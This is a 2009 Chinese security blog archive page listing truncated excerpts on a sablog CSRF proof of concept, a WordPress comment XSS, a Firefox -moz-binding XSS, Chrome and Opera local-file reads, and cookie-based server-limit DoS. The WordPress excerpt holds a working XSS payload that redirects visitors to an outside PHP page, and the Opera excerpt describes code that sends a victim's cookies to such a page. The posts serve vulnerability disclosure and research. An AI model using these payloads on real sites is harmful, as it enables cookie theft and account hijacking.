分类存档: WEB SECURITY

sablog1.6的CSRF漏洞POC

作者: 空虚浪子心 日期: 2009 年 07 月 20 日 12 条评论 | 1,420 views

sablog1.6的CSRF漏洞POC。

这个在我的blog中测试成功,官方下载的最新版本测试成功,但是在小泽的blog失败的。

原因是他自己修改了源程序,判断了referer。

 

[......]

继续阅读 »

wordpress281评论显示xss漏洞

作者: 空虚浪子心 日期: 2009 年 07 月 16 日 21 条评论 | 1,697 views

wordpress281评论显示xss漏洞

by kxlzx inbreak.net

ps:感谢鬼仔’blogXEYE’s blog协助测试。

实际上是个XSS漏洞。

 

POC

在评论的网址一栏,填写

http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs‘ onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,112);

[......]

继续阅读 »

FF3的《moz-binding: url》未限制文件扩展名导致XSS漏洞

作者: 空虚浪子心 日期: 2009 年 06 月 26 日 2 条评论 | 620 views

kxlzx:因为在http://hi.baidu.com/hi_heige/的留言被百度删除了,只好在这里发篇。

http://www.80vul.com/qqmail/QQmail%20Multiple%20Xss%20Vulnerabilities.htm

看到,FF3对

<style>BODY{-moz-binding:url("http://www.80vul.coom/test.xml#xss")}</style>

url中的域,是有限制的。

如果配合一些web应用的功能,可以绕过这个限制。

[......]

继续阅读 »

AJAX结合URL转发漏洞跨域提交数据

作者: 空虚浪子心 日期: 2009 年 05 月 08 日 没有评论 | 473 views

Chrome浏览器,在使用ajax的时候,通过url转发漏洞的配合,可以跨域提交数据(但是不能读取返回数据)。

IE6的某些版本(不知道是什么版本,在家里和某个网吧成功了),通过用户点“确定”后,也是可以跨域提交并接收数据的。

对于chrome这里,没办法读取目标域返回的数据,深感遗憾,所以发出来这篇文章,大家想想办法。

[......]

继续阅读 »

利用GOOGLE的分析器做server limit dos

作者: 空虚浪子心 日期: 2009 年 04 月 22 日 没有评论 | 404 views

本文纯属YY,最后未实践成功,但是不排除其他网站有类似可能。

很多网站都使用了google的统计。

当我们从一个网站(A)链接到带有google统计的网站(B)时,google会记录referer的URI,并存入B的COOKIE中。

如果我们可以影响referer,是不是就可以攻击任何带有google统计的网站呢?

[......]

继续阅读 »

Google Chrome使用ajax读取本地文件漏洞

作者: 空虚浪子心 日期: 2009 年 04 月 22 日 6 条评论 | 1,088 views

google的浏览器Chrome1.0.154.53(目前最新),存在ajax读取本地文件漏洞。

利用该漏洞可以读取本地文本文件,并提交出来。

而Chrome的cookie默认保存在“C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies”

Chrome的历史保存在"C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\History"

读取这个文件,然后提交,前提是文件在本地打开,但是如何欺骗用户在本地打开呢?

[......]

继续阅读 »

server limit dos利用随想

作者: 空虚浪子心 日期: 2009 年 04 月 21 日 4 条评论 | 675 views

看了墨西哥同学(其实看不懂,刺帮忙翻译的)和刺的文章,不过我们主要关心该技术的利用。

sirdarckcat的文章 说,HTTP头的长度,在APACHEweb服务器是有一定的要求的,如果超出一定长度,会产生服务器错误。HTTP头里面,有cookie,有location,有host。。。如果我们可以控制其中一个(例如cookie),给用户植入大长度的cookie,就会出现用户访问该域下所有的请求,都带上大长度cookie,导致用户不管访问域名下的哪个文件,都会产生服务器错误,造成客户端无法访问

本文讲这个东西具体的利用。

[......]

继续阅读 »

opera9.64的ajax读取本地文件漏洞还是没有补

作者: 空虚浪子心 日期: 2009 年 03 月 03 日 4 条评论 | 879 views

今天看到出了9.64了。

还是没有补啊。。。都到了9.64版本了,我提交了也N长时间了。

http://www.inbreak.net/?action=show&id=142

[......]

继续阅读 »

opera9.52使用ajax读取本地文件漏洞进一步利用

作者: 空虚浪子心 日期: 2009 年 01 月 06 日 3 条评论 | 506 views

在前文《opera9.52使用ajax读取本地文件漏洞》
中,提到了opera的ajax读取本地文件漏洞。

但是利用方式上,比较狭隘。

很少人会专门下载htm文件到本地,然后打开。

但是动态语言(php,asp等)只要修改header,就可以指定让用户下载。

[......]

继续阅读 »

opera 9.52使用ajax读取本地文件漏洞

作者: 空虚浪子心 日期: 2009 年 01 月 05 日 没有评论 | 368 views

这也可能是一个安全特性吧,opera可以使用ajax读取本地文件。

ff3没有这个漏洞。

不废话,看代码吧。

利用方式如下:

这段代码保存为本地htm文件,然后使用opera打开。

将会把本地用户名为administrator在alibaba的cookie,发送到http://www.inbreak.net/kxlzxtest/testxss/a.php

[......]

继续阅读 »